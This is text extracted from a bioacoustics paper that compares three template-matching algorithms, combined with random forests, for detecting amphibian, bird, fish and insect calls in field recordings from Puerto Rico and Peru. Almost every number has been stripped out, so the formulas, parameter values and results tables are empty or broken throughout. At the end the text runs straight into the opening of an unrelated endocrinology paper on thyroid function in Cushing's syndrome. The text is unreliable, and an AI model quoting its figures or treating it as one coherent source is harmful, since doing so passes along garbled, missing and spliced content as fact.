noaa, us navy, nga and gebco. figure recording location in peru. map data: google, us dept. of state geographer, image— landsat/copernicus and data—sio, noaa, us navy, nga and gebco. the locations in puerto rico were the sabana seca permanent station in toa baja, the casa la selva station in carite mountains (patillas), el yunque national forest in rio grande and mona island (see fig. ). the location in peru was the amarakaeri communal reserve in the madre de dios region (see fig. ). in all the locations, the recorders were programmed to record one minute of audio every min. the complete dataset has more than , -minute recordings. we randomly chose recordings from puerto rico and recordings from peru for comparing the three algorithm variants. we used the arbimon ii web application interface to annotate the presence or absence of species in all the recordings. regions in the recording where a species emits a sound were also marked using the web interface. each region of interest (roi) is a rectangle corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table species, class, location and count of recordings with validated data. species group total presence absence location eleutherodactylus cooki amphibian carite eleutherodactylus brittoni amphibian sabana seca eleutherodactylus cochranae amphibian sabana seca eleutherodactylus coqui amphibian sabana seca eleutherodactylus juanariveroi amphibian sabana seca unknown insect insect sabana seca epinephelus guttatus fish mona island megascops nudipes bird el yunque microcerculus marginatus bird peru basileuterus chrysogaster bird peru myrmoborus leucophrys bird peru basileuterus bivittatus bird peru liosceles thoracicus bird peru chlorothraupis carmioli bird peru megascops guatemalae bird peru saltator grossus bird peru myrmeciza hemimelaena bird peru thamnophilus schistaceus bird peru hypocnemis subflava bird peru percnostola lophotes bird peru formicarius analis bird peru delimited by starting time, ending time, lowest frequency and highest frequency along with a species and sound type. the species included in the analysis are listed in table , along with the number of total recordings and the number of recordings where the species is present or absent. algorithm the algorithm recognition process is divided into three phases: ( ) template computation, ( ) model training and ( ) detection (see fig. ). in template computation, all rois submitted by the user in the training set are aggregated into a template. in model training the template is used to compute recognition functions from validated audio recordings and features from the resulting vector v are computed. these features are used to train a random forest model. in the detection phase the template is used to compute the features, but this time the features are fed to the trained random forest model to compute a prediction of presence or absence. in the following sections the template computation process will be explained, then the process of using the template to extract features from a recording is presented and finally, the procedures to use the features to train the model and to detect recordings are discussed. template computation the template refers to the combination of all rois in the training data. to create a template, we first start with the examples of the specific call of interest (i.e., rois) that were annotated corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the three phases of the algorithm to create the species-specific models. in the model training phase reci is a recording, vi is the vector generated by the recognition function on reci and in the detec- tion phase v is the vector generated by the recognition function on the incoming recording. from a set of recordings for a given species and a specific call type (e.g., common, alarm). each roi encompasses an example of the call, and is an instance of time between time t and time t of a given recording and low and high boundary frequencies of f and f , where t < t and f < f . in a general sense, we combine these examples to produce a template of a specific song type of a single species. specifically, for each recording that has an annotated roi, a spectrogram matrix (sm) is computed using the short time fourier transform with a frame size of samples, samples of overlap and a hann analysis window, thus the matrices have rows. for a recording with a sampling rate of , hz, the matrix bin bandwidth is approximately . hz. the sm is arranged so that the row of index represents the lowest frequency and the row with index represents the highest frequency of the spectrum. properly stated the columns c to c and the rows from r to r of sm were extracted, where: c =bt × , c, c =bt × , c, r =bf / . c and r =bf / . c. the rows and columns that represent the roi in the recording (between frequencies f and f and between times t and t ) are extracted. the submatrix of sm that contains only the area bounded by the roi is define as smroi and refer in the manuscript as the roi matrix. since the roi matrices can vary in size, to compute the aggregation from the roi matrices we have to take into account the difference in the number of rows and columns of the matrices. all recordings have the same sampling rate, , hz. thus, the rows from different sms, computed with the same parameters, will represent the same frequencies, i.e., rows with same indexes represent the same frequency. after the roi matrix, smroi , has been extracted from sm, the rows of smroi will also represent specific frequencies. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flowchart of the algorithm to generate the template of each species. thus, if we were to perform an element-wise matrix sum between two roi matrices with potentially different number of rows, we should only sum rows that represent the same frequency. to take into account the difference in the number of columns of the roi matrices, we use the frobenius norm to optimize the alignment of the smaller roi matrices and perform element-wise sums between rows that represent the same frequency. we present that algorithm in the following section and a flow chart of the process in fig. . template computation algorithm: . generate the set of smroi matrices by computing the short time fourier transform of all the user generated rois. . create matrix smmax, a duplicate of the first created matrix among the matrices with the largest number of columns. . set cmax as the number of columns in smmax. . create matrix ttemp, with the same dimensions as smmax and all entries equal to . this matrix will contain the element-wise addition of all the extracted smroi matrices. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . create matrix w with the same dimensions of smmax and all entries equal to . this matrix will hold the count on the number of smroi matrices that participate in the calculation of each element of ttemp. . for each one of the smi roi matrices in smroi : (a) if smi has the same number of columns as ttemp: i. align the rows of smi and ttemp so they represent equivalent frequencies and perform an element-wise addition of the matrices and put the result in ttemp. ii. add one to all the elements of the w matrix where the previous addition participated. (b) if the number of columns differs between smi and ttemp, then find the optimal alignment with smmax as follows: i. set ci as the number of columns in smi. ii. define (smmax)i as the set of all submatrices of smmax with the same dimensions as smi. note that the cardinality of (smmax)i is cmax−ci. iii. for each subk ∈(smmax)i : a. compute dk =norm(subk−smi) where norm is the frobenius norm defined as: norm(a)= √∑ (i,j) |a i,j| where ai,j are the elements of matrix a. iv. define submin{dk} as the subk matrix with the minimum dk. this is the optimal alignment of smi with smmax. v. align the rows of submin{dk} and ttemp so they represent equivalent frequencies, perform an element-wise addition of the matrices and put the result in ttemp. vi. add one to all the elements of the w matrix where the previous addition participated. . define the matrix ttemplate as the element-wise division between the ttemp matrix and the w matrix. the resulting ttemplate matrix summarizes the information available in the roi matrices submitted by the user and it will be used to extract information from the audio recordings that are to be analyzed. in this article each species ttemplate was created using five rois. in fig. a a training set for the eleutherodactylus coqui is presented and in fig. b the resulting template can be seen. this tool is very useful because the user can see immediately the effect of adding or subtracting a specific sample to the training set. model training the goal of this phase is to train a random forest model. the input to train the random forest are a series of statistical features extracted from vectors vi that are created by computing a recognition function (similarity measure) between the computed ttemplate and submatrices of the spectrogram matrices of a series of recordings. in the following section, we present the details of the algorithm that processes a recording to create the recognition function vector, and in fig. we present a flowchart of the process. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (a) a training set with examples of the call of e. coqui. (b) the resulting template from the training set. figure flowchart of the algorithm to generate the similarity vector of each recording. algorithm to create the similarity vector: . compute matrix spec, the submatrix of the spectrogram matrix that contains the frequencies in ttemplate. note that we are dealing with recordings that have the same sample rate as the recordings used to compute the ttemplate. . define cspec, the number of columns of spec. . define ctemplate, the number of columns of ttemplate. note that cspec �ctemplate since the spec matrix have the same number of columns as the whole spectrogram and that the corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note that for recordings with a sample rate of , when we calculate the stft with a window of size and a % overlap, one step is equivalent to . ms; therefore, steps is less than ms. although this procedure may miss the strongest match, the length of the calls are much longer than the step interval; therefore, there is a high probability of detecting the species-specific call. ttemplate matrix fits c =cspec −ctemplate+ times inside the spec matrix. there are c submatrices of spec with the same dimensions as ttemplate. . define step, the step factor by which ttemplate will progressed over the spec matrix. . define n= ⌊ cspec−ctemplate step ⌋ + . note that if step= then n=c. in this work, however, this parameter was selected as step= as a trade-off for speed. . define speci as the submatrix of spec that spans the columns from i×step to i×step+ ctemplate. . set i= . . while i≤n (a) compute the similarity measure measi for speci (the definition of measi for each of the three variants is provided in the following section). (b) increase i by . note that this is equivalent to progressing step columns in the spec matrix. . define the vector v as the vector containing the n similarity measures resulting from the previous steps. that is, v =[meas ,meas ,meas ,...,measn]. recognition function we used three variations of a pattern match procedure to define the similarity measure vector v . first, the structural similarity index described in wang et al. ( ) and implemented in van der walt et al. ( ) as compare_ssim with the default window size of seven unless the generated pattern is smaller. it will be referred in the rest of the manuscript as the ssim variant. for the ssim variant we define measi as: measi=ssi(ttemplate,speci), where speci is the submatrix of spec that spans the columns from i× step to i×step+ ctemplate and the same number of rows as ttemplate and v =[meas ,meas ,meas , ...,measn] with n= ⌊ cspec −ctemplate step ⌋ + . second, the dynamic thresholding method (threshold_adaptive) described in van der walt et al. ( ) with a block size of and an arithmetic mean filter is used over both ttemplate and speci before multiplying them and applying the frobenius norm and normalized by the norm of a matrix with same dimensions as ttemplate and all elements equal to one. therefore, measi for the norm variant is defined as: measi=fn ( dtm(ttemplate) .∗ dtm(speci) ) /fn(u), where again speci is the submatrix of spec that spans the columns from i×step to i×step+ ctemplate, fn is the frobenius norm, dtm is the dynamic thresholding method, u is a matrix with same dimensions as ttemplate with all elements equal to one and .∗performs an element-wise multiplication of the matrices. again, v =[meas ,meas ,meas ,...,measn] with n= ⌊ cspec −ctemplate step ⌋ + . corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. finally, for the corr variation we first apply the opencv’s matchtemplate procedure (bradski, ) with the normalized correlation coefficient option to speci, the submatrix of spec that spans the columns from i×step to i×step+ ctemplate. however, for this variant, speci includes two additions rows above and below, thus it is slightly larger than the ttemplate. with these we can define: measj,i=corr(ttemplate,specj,i) where specj,i is the submatrix of speci that starts at row j (note that there are five such specj,i matrices). now, we select five points at random from all the points above the . percentile of measj,i and apply the structural similarity index to the strongly-matching regions. the size of these regions is eight thirds ( / ) of the length of ttemplate, / before and / after the strongly-matched point that was selected. then, define filterspec as the matrix that contains these strongly-matching regions and filterspeci as the submatrix of filterspec that spans the columns from i to i+ ctemplate then, the similarity measure for this variant is define as: measi=ssi(ttemplate,filterspeci) and the resulting vector v =[meas ,meas ,meas ,...,measn] but this time with n= × (⌊ / ×ctemplate ⌋ + ) . it is important to note that no matter which variant is used to calculate the similarity measures, the result will always be a vector of measurements v . the idea is that the statistical properties of these computed recognition functions have enough information to distinguish between a recording that has the target species present and a recording that does not have the target species present. however, notice that since cspec, the length of spec, is much larger that ctemplate the length of the vector v for the corr variant is much smaller than the other two. random forest model creation after calculating v for many recordings we can train a random forest model. first, we need a set of validated recordings with the specific species vocalization present in some recordings and absent in others. then for each recording we compute a vector vi as described in the previous section and extract the statistical features presented in table . these statistical features represent the dataset used to train the random forest model, which will be used to detect recordings for presence or absence of a species call event. these features along with the species presence information are used as input to a random forest classifier with a , trees. recording detection now that we have a trained model to detect a recording, we have to compute the statistical features from the similarity vector v of the selected recording. this is performed in the same way as it was described in the previous section. these features are then used as the input dataset to the previously trained random forest classifier and a label indicating presence or absence of the species in the recording is given as output. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the statistical features extracted from vector v . features . mean . median . minimum . maximum . standard deviation . maximum–minimum . skewness . kurtosis . hyper-skewness . hyper-kurtosis . histogram . cumulative frequency histogram the experiment in order to decide which of the three variants should be incorporated into the arbimon web-based system, we performed the algorithm explained in the previous section with each of the similarity measures. we computed -fold validations on each of the variants to obtained measurements of the performance of the algorithm. in each validation, % of the data is used as training and % of the data is used as validation data. each algorithm variant used the same -fold validation partition for each species. the measures calculated were the area under the receiver operating characteristic (roc) curve (auc), accuracy or correct detection rate (ac), negative predictive value (npv), precision or positive predictive value (pr), sensitivity, recall or true positive rate (se) and specificity or true negative rate (sp). to calculate the auc, the roc curve is created by plotting the false positive rate (which can be calculated as − specificity) against the true positive rate (sensitivity), then, the auc is created by calculating the area under that curve. notice that the further the auc is from . the better. the rest of the measures are defined as follows: ac = tp+tn tp+tn+fp+fn , npv = tn tn+fn , pr = tp tp+fp , se= tp tp+fn and sp= tn tn+fp with tp the number of true positives (number of times both the expert and the algorithm agree that the species is present), tn the number of true negatives (number of times both the expert and the algorithm agree that the species is not present), fp the number of false positives (number of times the algorithm states that the species is present while the expert states is absent) and fn the number of false negatives (number of times the algorithm states that the species is not present while the expert states it is present). note that accuracy is a weighted average of the sensitivity and the specificity. although we present and discuss all measures, we gave accuracy and the auc more importance because they include information on the true positive and true negative rates. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. specifically, auc is important when the number of positives is different than the number of negatives as is the case with some of the species. the experiment was performed in a computer with an intel i k cores processor at . ghz with gb of ram and running ubuntu linux. the execution time needed to detect each recording was registered and the mean and standard deviation of the execution times were calculated for each variant of the algorithm. we also computed the quantity of pixels on all the ttemplate matrices and correlated with the execution time of each of the variants. a global one-way analysis of variance (anova) was performed on the five calculated measures across all of the -fold validations to identify if there was a significant difference between the variants of the algorithm. then, a post-hoc tukey hsd comparison test was performed to identify which one of the variants was significantly different at the % confidence level. additionally, an anova was performed locally between the -fold validation of each species and on the mean execution time for each species across the algorithm variants to identify if there was any significant execution time difference at the % confidence level. similarly, a post-hoc tukey hsd comparison test was performed on the execution times. results the six measurements (area under the roc curve—auc, accuracy, negative predictive value, precision, sensitivity and specificity) computed to compared the model across the three variants varied greatly among the species. the lowest scores were among bird species while most of the highest scores came from amphibian species. table presents a summary of the results of the measurements comparing the three variants of the algorithm (for a detail presentation, see appendix ). the norm variant did not have the highest value for any of the measures summarized in table , while the corr variant had a greater number of species with % or greater for all the measures and an overall median accuracy of %. we considered these two facts fundamental for a general-purpose species detection system. the local species anova suggested that there are significant accuracy differences at the % significance level for six of the species studied as well as four in terms of precision and three in terms of specificity (see https://doi.org/ . /m .figshare. .v ). the algorithm variant corr had a higher mean and median auc at % and % respectively, but the ssim variant seems to be more stable with a standard deviation of %. in terms of accuracy, both the ssim and corr have higher mean accuracy than the norm variant. nevertheless, variant corr had the highest median accuracy of %, which is slightly higher than the median accuracy of the ssim variant at %. in addition, variant corr had more species with an accuracy of % or greater. in terms of median precision, the three variants had similar values, although in terms of mean precision variants ssim and corr have greater values than the norm variant. moreover, the median and mean precision of the ssim variant were only % higher than the median and mean precision of the corr variant. in terms of sensitivity, variants ssim corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. table summary of the measures of the three variants of the algorithm. best values are in bold. summary of measures ssim norm corr number of species with an area under the curve of % or greater number of species with statistically significant area under the curve mean area under the curve . . . median area under the curve . . . standard deviation of area under the curve . . . number of species with an accuracy of % or greater number of species with statistically significant accuracy mean accuracy . . . median accuracy . . . standard deviation of accuracy . . . number of species with a negative predictive value of % or greater number of species with statistically significant negative predictive value mean negative predictive value . . . median negative predictive value . . . standard deviation of negative predictive value . . . number of species with a precision of % or greater number of species with statistically significant precision mean precision . . . median precision . . . standard deviation of precision . . . number of species with a sensitivity of % or greater number of species with statistically significant sensitivity mean sensitivity . . . median sensitivity . . . standard deviation of sensitivity . . . number of species with a specificity of % or greater number of species with statistically significant specificity mean specificity . . . median specificity . . . standard deviation of specificity . . . ratio of false positive to true positive . . . ratio of false negative to true positive . . . ratio of false positive to true negative . . . ratio of false negative to true negative . . . and corr had greater values than the norm variant. it is only in terms of specificity that the corr variant has greater values than all other variants. figures and present a summary of these results with whisker graphs. in terms of execution times, an anova analysis on the mean execution time suggests a difference between the variants (f = . e+ ,df = ,p < . e– ). the corr variant had the lowest mean execution time at . s followed closely by the norm variant with . s, while the ssim variant had the slowest mean execution time of . s (fig. ). the tukey hsd test suggests that there was no statistical significant difference between the corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure whisker boxes of the -fold validations for the three variants of the presented algorithm for: (a) area under the roc curve and (b) accuracy. table summary of the execution times of the three variants of the algorithm. best values are in bold. ppmcc is the pearson product-moment correlation coefficient. summary of execution times ssim norm corr mean execution time . . . standard deviation of execution time . . . ppmcc between execution time and size of template . . . mean execution times of the norm and corr variants (p= . ). however, there was a statistical significant difference at the % confidence level between the mean execution times of all other pairs of variants, specifically variants ssim and corr (p < . e– ). moreover, the mean execution time of the ssim variant increased as the number of pixels in the ttemplate matrix increases (fig. b). there was no statistically significant relationship between the ttemplate pixel size and the execution time for the other two variants (table ). in summary, variants ssim and corr outperform the norm variant in most of the statistical measures computed having statistically significant high accuracy for three species each. in terms of execution time, the corr variant was faster than the ssim variant (table ), and the mean execution time of corr variant did not increase with increasing ttemplate size (table ). discussion the algorithm used by the arbimon system was selected by comparing three variants of a template-based method for the detection of presence or absence of a species vocalization in recordings. the most important features for selecting the algorithm were that it works well for many types of species calls and that it can process hundreds of thousands of recordings in a reasonable amount of time. the corr algorithm was selected because of its speed corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure whisker boxes of the -fold validations for the three variants of the presented algorithm for: (a) negative predictive value, (b) precision, (c) sensitivity and (d) specificity. and its comparable performance in terms of detection efficiency with the ssim variant. it achieved auc and accuracy of . or better in of the species and sensitivity of . or more in of the species and the average execution time of . s per minute of recording means that it can process around , minutes of recordings per hour. the difference in execution time between the ssim variant and the other two was due to a memory management issue in the ssim algorithm. an analysis revealed that all the corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (a) whisker boxes of the execution times of the three algorithms. (b) execution times as a function of the size of the template in number of pixels. algorithms have time complexity of o (( cspec −ctemplate ) ×ctemplate×rtemplate ) where cspec and ctemplate are the number of columns in spec and ttemplate respectively and rtemplate is the number of rows in ttemplate. the only explanation we can give is that the ssim function uses an uniformly distributed filter (uniform_filter) that has a limit on the size of the memory buffer ( , -bit doubles divided by the number of elements in the dimension been process). therefore, as the size of ttemplate increases the number of calls to allocate the buffer, free and allocate again can become a burden since it has a smaller locality of reference even when the machine has enough memory and cache to handle the process. further investigation is required to confirm this. an interesting comparison is the method described in the work by fodor ( ) and adapted and tested by lasseck ( ). this method was design for the neural information processing scaled for bioacoustics (nips b) competition, and although the results are very good they do not report on time of execution. as we have mentioned, it is very important to us to have a method that provides good response times and the execution time of lasseck’s method seems to be greater than ours given the extensive pre-processing that the method performs. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table summary of the usage of the arbimon system and its model creation feature. number of users in the system number of recordings in the system , , number of models created by users total number of detected recordings , , number of distinct detected recordings , average times a recording is detected . standard deviation of the number of times a recording is detected . maximum number of times a recordings has been detected conclusions and future work now that passive autonomous acoustic recorders are readily available the amount of data is growing exponentially. for example, one permanent station recording one minute of every minutes every day of the year generates , one minute recordings. if this is multiplied by the need to monitor thousands of locations across the planet, one can understand the magnitude of the task at hand. we have shown how the algorithm used in the arbimon ii web-based cloud-hosted system was selected. we compared the performance in terms of the ability to detect and the efficiency in terms of time execution of three variants of a template-based detection algorithm. the result was a method that uses the power of a widely use method to determine the similarity between two images (structural similarity index (wang et al., )), but to accelerate the detection process, the analysis was only done in regions where there was a strong-match determined by the opencv’s matchtemplate procedure (bradski, ). the results show that this method performed better both in terms of ability to detect as well as in terms of execution time. a fast and accurate general-purpose algorithm for detecting presence or absence of a species complements the other tools of the arbimon system, such as options for creating playlists based on many different parameters including user-created tags (see table ). for example, the system currently has , , -minute recordings uploaded by users and species specific models have been created and run over , , min of recordings of which , are distinct recordings. while this research was a prove of concept, we provide the tools and encourage users to increase the size of the training data set as this should improve the performance of the algorithm. in addition, we will pursue other approaches, such as multi-label learning (xie et al., ; zhang et al., ; briggs et al., ). as a society, it is fundamental that we study the effects of climate change and deforestation on the fauna and we have to do it with the best possible tools. we are collecting a lot of data, but until recently there was not an intuitive and user-friendly system that allowed scientists to manage and analyze large number of recordings. here we presented a web-based cloud-hosted system that provides a simple way to manage large quantities of recordings with a general-purpose method to detect their presence in recordings. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. acknowledgements the authors want to thank marconi campos-cerqueira for his helpful comments on the manuscript. appendix table provide a detail presentation of the performance of each variant of the algorithm: the area under the roc curve, mean accuracy, mean precision, mean sensitivity and mean specificity values for each species, of the -fold validations for the three variants of the presented algorithm (ssim, norm and corr). the mean, median and standard deviation values across all species are presented at the bottom of the table. appendix the templates created by the training sets of each species are presented. we classified them by the algorithm that presented a better accuracy for that species. figure presents the templates of the species where the ssim variant presented better accuracy, fig. presents those where the norm variant presented better accuracy, and fig. presents the species where the corr variant presented better accuracy. figure sample of species that the ssim variant presented better accuracy. (a) f. analis, (b) m. hemimelaena, (c) e. cooki, (d) p. lophotes, (e) e. coqui, (f) t. schistaceus and (g) h. subflava. species (a–c) are statistically significant. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table area under the roc curve (auc), accuracy (ac), negative predictive value (npv), precision (pr), sensitivity (se) and specificity (sp) of the species and three variants of the algorithm. best values are shaded and the cases where the anova suggested a significant difference between the algorithm variants at the % con- fidence level are in bold . species ssim norm corr auc ac npv pr se sp auc ac npv pr se sp auc ac npv pr se sp e. brittoni . . . . . . . . . . . . . . . . . . e. cochranae . . . . . . . . . . . . . . . . . . m. guatemalae . . . . . . . . . . . . . . . . . . e. cooki . . . . . . . . . . . . . . . . . . unknown insect . . . . . . . . . . . . . . . . . . e. coqui . . . . . . . . . . . . . . . . . . m. leucophrys . . . . . . . . . . . . . . . . . . e. juanariveroi . . . . . . . . . . . . . . . . . . m. nudipes . . . . . . . . . . . . . . . . . . b. bivittatus . . . . . . . . . . . . . . . . . . c. carmioli . . . . . . . . . . . . . . . . . . l. thoracicus . . . . . . . . . . . . . . . . . . f. analis . . . . . . . . . . . . . . . . . . e. guttatus . . . . . . . . . . . . . . . . . . m. hemimelaena . . . . . . . . . . . . . . . . . . b. chrysogaster . . . . . . . . . . . . . . . . . . s. grossus . . . . . . . . . . . . . . . . . . p. lophotes . . . . . . . . . . . . . . . . . . h. subflava . . . . . . . . . . . . . . . . . . m. marginatus . . . . . . . . . . . . . . . . . . t. schistaceus . . . . . . . . . . . . . . . . . . mean values . . . . . . . . . . . . . . . . . . median values . . . . . . . . . . . . . . . . . . standard dev. . . . . . . . . . . . . . . . . . . c orrada b ravo etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure sample of species that the norm variant presented better accuracy. (a) unknown insect, (b) b. chrysogaster, (c) s. grossus, (d) m. guatemalae and (e) e. juanariveroi. neither is statistically significant. figure sample of species that the corr variant presented better accuracy. (a) e. cochranae, (b) m. leucophrys, (c) b. bivittatus, (d) c. carmioli, (e) m. marginatus, (f) m. nudipes, (g) e. brittoni, (h) e. gut- tatus and (i) l. thoracicus. species (a–c) are statistically significant. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests carlos j. corrada bravo and t. mitchell aide are the founders of sieve analytics, inc. rafael Álvarez berríos was an employee of sieve analytics, inc. author contributions • carlos j. corrada bravo conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • rafael Álvarez berríos conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • t. mitchell aide conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: corrada bravo, carlos j ( ): code, recordings, validations and regions of interest. figshare. https://doi.org/ . /m .figshare. .v . references acevedo ma, corrada-bravo cj, corrada-bravo h, villanueva-rivera lj, aide tm. . automated classification of bird and amphibian calls using ma- chine learning: a comparison of methods. ecological informatics : – doi . /j.ecoinf. . . . acevedo m, villanueva-rivera l. . using automated digital recording systems as effective tools for the monitoring of birds and amphibians. wildlife society bulletin : – doi . / - ( ) [ :uadrsa] . .co; . adams md, law bs, gibson ms. . reliable automation of bat call identification for eastern new south wales, australia, using classification trees and anascheme software. acta chiropterologica ( ): – . aide tm, corrada-bravo c, campos-cerqueira m, milan c, vega g, alvarez r. . real-time bioacoustics monitoring and automated species identification. peerj :e doi . /peerj. . anderson se, dave as, margoliash d. . template-based automatic recognition of birdsong syllables from continuous recordings. the journal of the acoustical society of america : – doi . / . . corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /j.ecoinf. . . http://dx.doi.org/ . / - ( ) [ :uadrsa] . .co; http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. blumstein dt, mennill dj, clemins p, girod l, yao k, patricelli g, deppe jl, krakauer ah, clark c, cortopassi ka, hanser sf, mccowan b, ali am, kirschel ang. . acoustic monitoring in terrestrial environments using microphone arrays: applications, technological considerations and prospectus. journal of applied ecology ( ): – doi . /j. - . . .x. bradski g. . the opencv library. doctor dobbs journal ( ): – . brandes st. . automated sound recording and analysis techniques for bird surveys and conservation. bird conservation international : – doi . /s . briggs f, lakshminarayanan b, neal l, fern xz, raich r, hadley sjk, hadley as, betts mg. . acoustic classification of multiple simultaneous bird species: a multi-instance multi-label approach. the journal of the acoustical society of america ( ): – doi . / . . celis-murillo a, deppe jl, ward mp. . effectiveness and utility of acoustic recordings for surveying tropical birds. journal of field ornithology ( ): – doi . /j. - . . .x. chabot d. . a quantitative technique to compare and classify humpback whale (megaptera novaeangliae) sounds. ethology ( ): – doi . /j. - . .tb .x. clark cw, marler p, beeman k. . quantitative analysis of animal vocal phonology: an application to swamp sparrow song. ethology ( ): – doi . /j. - . .tb .x. fagerlund s. . bird species recognition using support vector machines. eurasip journal on applied signal processing ( ): – . fodor g. . the ninth annual mlsp competition: first place. in: machine learning for signal processing (mlsp), ieee international workshop on ieee, – . grigg g, taylor a, mc callum h, watson g. . monitoring frog communities: an application of machine learning. in: proceedings of eighth innovative applications of artificial intelligence conference, portland oregon, – . gunasekaran s, revathy k. . content-based classification and retrieval of wild animal sounds using feature selection algorithm. in: second international conference on machine learning and computing.. han nc, muniandy sv, dayou j. . acoustic classification of australian anurans based on hybrid spectral-entropy approach. applied acoustics ( ): – . henderson e, hildebrand ja, smith mh. . classification of behavior using vocalizations of pacific white-sided dolphins (lagenorhynchus obliquidens). the journal of the acoustical society of america ( ): – . lammers mo, brainard re, au wwl, mooney ta, wong kb. . an ecological acoustic recorder (ear) for long-term monitoring of biological and anthropogenic sounds on coral reefs and other marine habitats. the journal of the acoustical society of america : – doi . / . . corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /s http://dx.doi.org/ . / . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. lasseck m. . bird song classification in field recordings: winning solution for nips b competition. in: proc. of int. symp. neural information scaled for bioacoustics, sabiod. org/nips b, joint to nips, nevada, – . marques ta, thomas l, martin sw, mellinger dk, ward ja, moretti dj, harris d, tyack pl. . estimating animal population density using passive acoustics. biological reviews ( ): – doi . /brv. . mellinger dk, clark cw. . recognizing transient low-frequency whale sounds by spectrogram correlation. the journal of the acoustical society of america : – doi . / . . sueur j, pavoine s, hamerlynck o, duvail s. . rapid acoustic survey for biodiver- sity appraisal. plos one :e doi . /journal.pone. . taylor a. . bird flight call discrimination using machine learning. the journal of the acoustical society of america ( ): – . terborgh j, robinson sk, parker iii ta, munn ca, pierpont n. . structure and organization of an amazonian forest bird community. ecological monographs : – doi . / . tricas tc, boyle k. . validated reef fish sound scans of passive acoustic monitors on hawaiian coral reefs [abstract ]. the journal of the acoustical society of america ( ) doi . / . . van der walt s, schönberger jl, nunez-iglesias j, boulogne f, warner jd, yager n, gouillart e, yu t, the scikit-image contributors. . scikit-image: image processing in python. peerj :e doi . /peerj. . villanueva-rivera lj, pijanowski bc. . pumilio: a web-based management system for ecological recordings. emerging technologies : – doi . / - - . . . walther g-r, post e, convey p, menzel a, parmesan c, beebee tjc, fromentin j-m, hoegh-guldberg o, bairlein f. . ecological responses to recent climate change. nature ( ): – doi . / a. wang z, bovik ac, sheikh hr, simoncelli ep. . image quality assessment: from error visibility to structural similarity. ieee transactions on image processing ( ): – doi . /tip. . . xie j, michael t, zhang j, roe p. . detecting frog calling activity based on acoustic event detection and multi-label learning. procedia computer science : – doi . /j.procs. . . . zhang l, towsey m, xie j, zhang j, roe p. . using multi-label classification for acoustic pattern detection and assisting bird species surveys. applied acoustics : – doi . /j.apacoust. . . . corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /brv. http://dx.doi.org/ . / . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / - - . . http://dx.doi.org/ . / a http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /j.apacoust. . . http://dx.doi.org/ . /peerj-cs. : – b xiang, r tao et al. thyroid functions in cushing’s syndrome research a study of thyroid functions in patients with cushing’s syndrome: a single-center experience boni xiang ,*, ran tao ,*, xinhua liu , xiaoming zhu , min he , zengyi ma , yehong yang , zhaoyun zhang , yiming li , zhenwei yao , yongfei wang and hongying ye department of endocrinology and metabolism, huashan hospital, fudan university, shanghai, china department of neurosurgery, huashan hospital, fudan university, shanghai, china department of radiology, huashan hospital, fudan university, shanghai, china correspondence should be addressed to h ye: yehongying@huashan.org.cn *(b xiang and r tao contributed equally to this work) abstract objective: the aim of this study was to evaluate thyroid functions in cushing’s syndrome (cs), the dynamic changes of thyroid hormones and antithyroid antibodies in cushing’s disease (cd) pre- and postoperatively. design and methods: this is a retrospective study enrolling patients with cs ( cd, adrenal cs and ectopic adrenocorticotropic syndrome (eas)). thyroid functions (thyroid-stimulation hormone (tsh), 